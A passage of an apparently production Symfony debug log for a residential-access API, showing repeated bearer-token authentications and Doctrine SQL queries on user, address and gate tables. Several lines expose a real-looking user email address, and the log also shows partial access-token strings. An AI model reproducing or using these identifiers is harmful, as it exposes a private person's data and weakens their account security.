  8938. [2025-12-21 00:31:26] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8939. [2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  8940. [2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8941. [2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  8942. [2025-12-21 00:31:26] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  8943. [2025-12-21 00:31:34] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  8944. [2025-12-21 00:31:34] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  8945. [2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8946. [2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8947. [2025-12-21 00:31:34] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  8948. [2025-12-21 00:31:34] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  8949. [2025-12-21 00:31:34] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8950. [2025-12-21 00:31:34] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8951. [2025-12-21 00:31:34] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8952. [2025-12-21 00:31:34] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8953. [2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8954. [2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8955. [2025-12-21 00:31:34] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8956. [2025-12-21 00:31:34] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8957. [2025-12-21 00:31:34] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8958. [2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  8959. [2025-12-21 00:31:34] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8960. [2025-12-21 00:31:34] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8961. [2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  8962. [2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8963. [2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  8964. [2025-12-21 00:31:34] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  8965. [2025-12-21 00:31:39] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  8966. [2025-12-21 00:31:39] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  8967. [2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8968. [2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8969. [2025-12-21 00:31:39] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  8970. [2025-12-21 00:31:39] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  8971. [2025-12-21 00:31:39] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8972. [2025-12-21 00:31:39] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8973. [2025-12-21 00:31:39] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8974. [2025-12-21 00:31:39] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8975. [2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8976. [2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8977. [2025-12-21 00:31:39] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8978. [2025-12-21 00:31:39] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8979. [2025-12-21 00:31:39] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8980. [2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  8981. [2025-12-21 00:31:39] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8982. [2025-12-21 00:31:39] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8983. [2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  8984. [2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8985. [2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  8986. [2025-12-21 00:31:39] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  8987. [2025-12-21 00:31:49] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  8988. [2025-12-21 00:31:49] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  8989. [2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8990. [2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8991. [2025-12-21 00:31:49] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  8992. [2025-12-21 00:31:49] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  8993. [2025-12-21 00:31:49] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8994. [2025-12-21 00:31:49] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8995. [2025-12-21 00:31:49] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8996. [2025-12-21 00:31:49] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8997. [2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8998. [2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8999. [2025-12-21 00:31:49] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9000. [2025-12-21 00:31:49] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9001. [2025-12-21 00:31:49] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9002. [2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9003. [2025-12-21 00:31:49] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9004. [2025-12-21 00:31:49] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9005. [2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9006. [2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9007. [2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  9008. [2025-12-21 00:31:49] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9009. [2025-12-21 00:31:55] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9010. [2025-12-21 00:31:55] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9011. [2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  9012. [2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9013. [2025-12-21 00:31:55] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9014. [2025-12-21 00:31:55] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9015. [2025-12-21 00:31:55] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9016. [2025-12-21 00:31:55] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9017. [2025-12-21 00:31:55] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9018. [2025-12-21 00:31:55] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9019. [2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  9020. [2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9021. [2025-12-21 00:31:55] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9022. [2025-12-21 00:31:55] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9023. [2025-12-21 00:31:55] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9024. [2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9025. [2025-12-21 00:31:55] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9026. [2025-12-21 00:31:55] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9027. [2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9028. [2025-12-21 00:31:55] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
